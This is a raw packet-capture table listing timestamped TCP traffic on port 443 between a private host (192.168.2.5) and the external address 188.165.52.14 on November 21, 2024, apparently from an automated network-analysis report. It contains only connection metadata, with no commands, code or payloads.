Nov 21, 2024 22:12:20.685250998 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.685300112 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.685323000 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.685329914 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.685358047 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.685376883 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.739754915 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.739833117 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.739856005 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.739869118 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.739893913 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.739909887 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.745588064 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.745634079 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.745667934 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.745675087 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.745706081 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.751286983 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.751370907 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.751391888 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.751452923 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.756247997 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.756292105 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.756339073 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.756346941 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.756373882 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.756392956 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.762124062 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.762166977 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.762203932 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.762209892 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.762238026 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.762250900 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.767390966 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.767443895 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.767463923 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.767469883 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.767497063 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.767517090 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.872786045 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.872814894 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.872874975 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.872908115 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.872935057 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.872946978 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.877687931 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.877712011 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.877769947 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.877779007 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.877816916 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.931763887 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.931813955 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.931888103 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.931912899 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.931931019 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.931955099 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.937232971 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.937275887 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.937309980 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.937316895 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.937344074 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.937357903 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.942979097 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.943037987 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.943058014 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.943065882 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.943090916 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.943103075 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.947797060 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.947839022 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.947881937 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.947890997 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.947906017 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.947931051 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.953479052 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.953521967 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.953551054 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.953557968 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.953583002 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.953600883 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.959561110 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.959603071 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.959639072 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.959647894 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:20.959671974 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:20.959692001 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.064954042 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.065007925 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.065066099 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.065078020 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.065114021 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.065128088 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.070168972 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.070214033 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.070252895 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.070260048 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.070286036 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.070308924 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.127043962 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.127089977 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.127135038 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.127144098 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.127305984 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.127305984 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.132641077 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.132684946 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.132719040 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.132725000 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.132751942 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.132771969 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.138345957 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.138389111 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.138426065 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.138433933 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.138458014 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.138474941 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.143304110 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.143366098 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.143379927 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.143387079 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.143415928 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.143435955 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.148901939 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.148964882 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.148977041 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.148983955 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.149013042 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.149033070 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.154845953 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.154891968 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.154927969 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.154941082 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.154954910 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.154979944 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.262689114 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.262737989 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.262968063 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.262968063 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.262993097 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.263044119 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.267551899 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.267596960 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.267664909 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.267677069 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.267724991 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.319597006 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.319648027 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.319689035 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.319699049 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.319727898 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.319749117 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.325176001 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.325218916 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.325278044 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.325278044 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.325284958 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.325323105 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.330115080 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.330162048 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.330188990 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.330197096 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.330218077 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.330233097 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.335777998 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.335819960 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.335841894 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.335849047 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.335891008 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.335891008 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.341407061 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.341450930 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.341475010 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.341480970 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.341511965 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.341532946 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.346728086 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.346777916 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.346796036 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.346803904 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.346831083 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.346848011 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.454610109 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.454701900 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.454731941 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.454742908 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.454788923 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.459625006 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.459671021 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.459717035 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.459729910 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.459742069 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.459764957 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.512268066 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.512312889 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.512375116 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.512386084 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.512444019 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.517102003 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.517143965 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.517183065 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.517189980 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.517201900 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.517225027 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.522420883 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.522464991 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.522504091 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.522517920 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.522540092 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.522562027 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.528214931 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.528256893 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.528294086 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.528306007 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.528333902 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.528347969 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.533298016 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.533339977 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.533387899 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.533394098 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.533426046 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.533447981 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.538494110 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.538539886 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.538574934 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.538582087 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.538614035 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.538635015 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.646183968 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.646226883 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.646298885 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.646317005 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.646351099 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.646372080 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.651293993 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.651325941 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.651379108 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.651388884 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.651402950 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.651427031 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.703998089 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.704022884 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.704132080 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.704159021 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.704205990 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.709692955 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.709714890 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.709774017 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.709784031 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.709798098 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.709817886 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.714766979 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.714787006 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.714833021 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.714840889 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.714870930 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.714885950 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.720468044 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.720487118 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.720558882 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.720566988 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.720582962 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.720597982 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.725889921 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.725910902 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.725974083 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.725982904 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.726027966 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.731168032 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.731188059 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.731244087 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.731251001 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.731287003 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.838433027 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.838481903 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.838531017 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.838546038 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.838581085 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.838602066 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.843444109 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.843488932 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.843528986 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.843548059 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.843578100 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.843601942 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.896895885 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.896943092 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.897155046 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.897155046 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.897171021 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.897214890 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.901978016 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.902049065 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.902091026 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.902098894 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.902127028 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.902144909 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.907501936 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.907553911 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.907581091 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.907588959 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.907618046 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.907635927 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.913132906 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.913182974 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.913220882 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.913232088 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.913273096 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.913290977 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.918117046 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.918163061 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.918199062 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.918206930 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.918234110 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.918251038 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.924093008 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.924139977 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.924165010 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.924179077 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:21.924204111 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:21.924213886 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.030478954 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.030540943 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.030715942 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.030750036 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.030801058 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.035865068 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.035913944 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.036047935 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.036047935 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.036081076 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.036134005 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.088968039 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.089030981 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.089152098 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.089179993 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.089230061 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.089241982 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:22.093764067 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.093811035 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:22.093857050 CET	49824	443	192.168.2.5	188.165.52.14
